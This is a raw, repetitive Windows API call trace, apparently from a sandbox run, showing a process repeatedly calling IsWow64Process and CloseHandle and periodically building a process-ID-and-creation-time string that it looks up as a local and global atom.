	[0132.125] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.125] CloseHandle (hObject=0x2dc) returned 1
	[0132.125] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.125] CloseHandle (hObject=0x2dc) returned 1
	[0132.125] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.125] CloseHandle (hObject=0x2dc) returned 1
	[0132.125] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.125] CloseHandle (hObject=0x2dc) returned 1
	[0132.125] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.125] CloseHandle (hObject=0x2dc) returned 1
	[0132.126] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.126] CloseHandle (hObject=0x2dc) returned 1
	[0132.126] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.126] CloseHandle (hObject=0x2dc) returned 1
	[0132.126] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.126] CloseHandle (hObject=0x2dc) returned 1
	[0132.126] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.126] CloseHandle (hObject=0x2dc) returned 1
	[0132.126] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.127] CloseHandle (hObject=0x2dc) returned 1
	[0132.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.127] CloseHandle (hObject=0x2dc) returned 1
	[0132.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.127] CloseHandle (hObject=0x2dc) returned 1
	[0132.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.127] CloseHandle (hObject=0x2dc) returned 1
	[0132.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.127] CloseHandle (hObject=0x2dc) returned 1
	[0132.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.128] CloseHandle (hObject=0x2dc) returned 1
	[0132.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.128] CloseHandle (hObject=0x2dc) returned 1
	[0132.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.128] CloseHandle (hObject=0x2dc) returned 1
	[0132.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.130] CloseHandle (hObject=0x2dc) returned 1
	[0132.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.131] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.131] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.131] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.131] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.132] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.132] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.132] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.132] CloseHandle (hObject=0x2dc) returned 1
	[0132.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.132] CloseHandle (hObject=0x2dc) returned 1
	[0132.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.133] CloseHandle (hObject=0x2dc) returned 1
	[0132.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.133] CloseHandle (hObject=0x2dc) returned 1
	[0132.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.133] CloseHandle (hObject=0x2dc) returned 1
	[0132.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.133] CloseHandle (hObject=0x2dc) returned 1
	[0132.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.166] CloseHandle (hObject=0x2dc) returned 1
	[0132.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.166] CloseHandle (hObject=0x2dc) returned 1
	[0132.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.166] CloseHandle (hObject=0x2dc) returned 1
	[0132.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.166] CloseHandle (hObject=0x2dc) returned 1
	[0132.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.167] CloseHandle (hObject=0x2dc) returned 1
	[0132.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.167] CloseHandle (hObject=0x2dc) returned 1
	[0132.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.167] CloseHandle (hObject=0x2dc) returned 1
	[0132.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.167] CloseHandle (hObject=0x2dc) returned 1
	[0132.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.168] CloseHandle (hObject=0x2dc) returned 1
	[0132.168] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.168] CloseHandle (hObject=0x2dc) returned 1
	[0132.168] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.168] CloseHandle (hObject=0x2dc) returned 1
	[0132.168] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.168] CloseHandle (hObject=0x2dc) returned 1
	[0132.168] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.168] CloseHandle (hObject=0x2dc) returned 1
	[0132.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.169] CloseHandle (hObject=0x2dc) returned 1
	[0132.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.169] CloseHandle (hObject=0x2dc) returned 1
	[0132.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.169] CloseHandle (hObject=0x2dc) returned 1
	[0132.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.169] CloseHandle (hObject=0x2dc) returned 1
	[0132.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.170] CloseHandle (hObject=0x2dc) returned 1
	[0132.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.170] CloseHandle (hObject=0x2dc) returned 1
	[0132.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.170] CloseHandle (hObject=0x2dc) returned 1
	[0132.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.170] CloseHandle (hObject=0x2dc) returned 1
	[0132.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.171] CloseHandle (hObject=0x2dc) returned 1
	[0132.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.171] CloseHandle (hObject=0x2dc) returned 1
	[0132.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.171] CloseHandle (hObject=0x2dc) returned 1
	[0132.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.171] CloseHandle (hObject=0x2dc) returned 1
	[0132.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.172] CloseHandle (hObject=0x2dc) returned 1
	[0132.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.172] CloseHandle (hObject=0x2dc) returned 1
	[0132.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.172] CloseHandle (hObject=0x2dc) returned 1
	[0132.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.172] CloseHandle (hObject=0x2dc) returned 1
	[0132.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.173] CloseHandle (hObject=0x2dc) returned 1
	[0132.173] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.173] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.173] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.173] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.174] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.174] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.174] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.174] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.174] CloseHandle (hObject=0x2dc) returned 1
	[0132.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.175] CloseHandle (hObject=0x2dc) returned 1
	[0132.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.175] CloseHandle (hObject=0x2dc) returned 1
	[0132.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.175] CloseHandle (hObject=0x2dc) returned 1
	[0132.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.175] CloseHandle (hObject=0x2dc) returned 1
	[0132.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.176] CloseHandle (hObject=0x2dc) returned 1
	[0132.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.208] CloseHandle (hObject=0x2dc) returned 1
	[0132.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.209] CloseHandle (hObject=0x2dc) returned 1
	[0132.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.209] CloseHandle (hObject=0x2dc) returned 1
	[0132.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.209] CloseHandle (hObject=0x2dc) returned 1
	[0132.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.210] CloseHandle (hObject=0x2dc) returned 1
	[0132.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.210] CloseHandle (hObject=0x2dc) returned 1
	[0132.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.210] CloseHandle (hObject=0x2dc) returned 1
	[0132.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.210] CloseHandle (hObject=0x2dc) returned 1
	[0132.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.210] CloseHandle (hObject=0x2dc) returned 1
	[0132.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.211] CloseHandle (hObject=0x2dc) returned 1
	[0132.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.211] CloseHandle (hObject=0x2dc) returned 1
	[0132.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.211] CloseHandle (hObject=0x2dc) returned 1
	[0132.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.211] CloseHandle (hObject=0x2dc) returned 1
	[0132.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.212] CloseHandle (hObject=0x2dc) returned 1
	[0132.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.212] CloseHandle (hObject=0x2dc) returned 1
	[0132.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.212] CloseHandle (hObject=0x2dc) returned 1
	[0132.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.212] CloseHandle (hObject=0x2dc) returned 1
	[0132.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.213] CloseHandle (hObject=0x2dc) returned 1
	[0132.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.213] CloseHandle (hObject=0x2dc) returned 1
	[0132.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.213] CloseHandle (hObject=0x2dc) returned 1
	[0132.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.213] CloseHandle (hObject=0x2dc) returned 1
	[0132.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.214] CloseHandle (hObject=0x2dc) returned 1
	[0132.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.214] CloseHandle (hObject=0x2dc) returned 1
	[0132.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.214] CloseHandle (hObject=0x2dc) returned 1
	[0132.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.214] CloseHandle (hObject=0x2dc) returned 1
	[0132.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.215] CloseHandle (hObject=0x2dc) returned 1
	[0132.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.215] CloseHandle (hObject=0x2dc) returned 1
	[0132.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.215] CloseHandle (hObject=0x2dc) returned 1
	[0132.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.215] CloseHandle (hObject=0x2dc) returned 1
	[0132.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.215] CloseHandle (hObject=0x2dc) returned 1
	[0132.216] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.216] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.216] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.216] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.217] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.217] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.217] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.217] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.217] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.217] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.217] CloseHandle (hObject=0x2dc) returned 1
	[0132.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.218] CloseHandle (hObject=0x2dc) returned 1
	[0132.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.218] CloseHandle (hObject=0x2dc) returned 1
	[0132.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.218] CloseHandle (hObject=0x2dc) returned 1
	[0132.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.218] CloseHandle (hObject=0x2dc) returned 1
	[0132.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.219] CloseHandle (hObject=0x2dc) returned 1
	[0132.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.252] CloseHandle (hObject=0x2dc) returned 1
	[0132.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.253] CloseHandle (hObject=0x2dc) returned 1
	[0132.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.253] CloseHandle (hObject=0x2dc) returned 1
	[0132.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.253] CloseHandle (hObject=0x2dc) returned 1
	[0132.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.253] CloseHandle (hObject=0x2dc) returned 1
	[0132.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.254] CloseHandle (hObject=0x2dc) returned 1
	[0132.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.254] CloseHandle (hObject=0x2dc) returned 1
	[0132.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.254] CloseHandle (hObject=0x2dc) returned 1
	[0132.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.254] CloseHandle (hObject=0x2dc) returned 1
	[0132.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.255] CloseHandle (hObject=0x2dc) returned 1
	[0132.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.255] CloseHandle (hObject=0x2dc) returned 1
	[0132.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.255] CloseHandle (hObject=0x2dc) returned 1
	[0132.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.255] CloseHandle (hObject=0x2dc) returned 1
	[0132.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.256] CloseHandle (hObject=0x2dc) returned 1
	[0132.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.256] CloseHandle (hObject=0x2dc) returned 1
	[0132.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.256] CloseHandle (hObject=0x2dc) returned 1
	[0132.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.256] CloseHandle (hObject=0x2dc) returned 1
	[0132.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.257] CloseHandle (hObject=0x2dc) returned 1
	[0132.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.257] CloseHandle (hObject=0x2dc) returned 1
	[0132.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.257] CloseHandle (hObject=0x2dc) returned 1
	[0132.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.257] CloseHandle (hObject=0x2dc) returned 1
	[0132.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.257] CloseHandle (hObject=0x2dc) returned 1
	[0132.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.258] CloseHandle (hObject=0x2dc) returned 1
	[0132.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.258] CloseHandle (hObject=0x2dc) returned 1
	[0132.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.258] CloseHandle (hObject=0x2dc) returned 1
	[0132.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.258] CloseHandle (hObject=0x2dc) returned 1
	[0132.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.259] CloseHandle (hObject=0x2dc) returned 1
	[0132.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.259] CloseHandle (hObject=0x2dc) returned 1
	[0132.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.259] CloseHandle (hObject=0x2dc) returned 1
	[0132.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.259] CloseHandle (hObject=0x2dc) returned 1
	[0132.260] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.260] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.260] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.260] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.260] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.261] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.261] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.261] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.261] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.261] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.261] CloseHandle (hObject=0x2dc) returned 1
	[0132.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.262] CloseHandle (hObject=0x2dc) returned 1
	[0132.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.262] CloseHandle (hObject=0x2dc) returned 1
	[0132.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.262] CloseHandle (hObject=0x2dc) returned 1
	[0132.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.262] CloseHandle (hObject=0x2dc) returned 1
	[0132.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.263] CloseHandle (hObject=0x2dc) returned 1
	[0132.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.295] CloseHandle (hObject=0x2dc) returned 1
	[0132.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.295] CloseHandle (hObject=0x2dc) returned 1
	[0132.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.296] CloseHandle (hObject=0x2dc) returned 1
	[0132.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.296] CloseHandle (hObject=0x2dc) returned 1
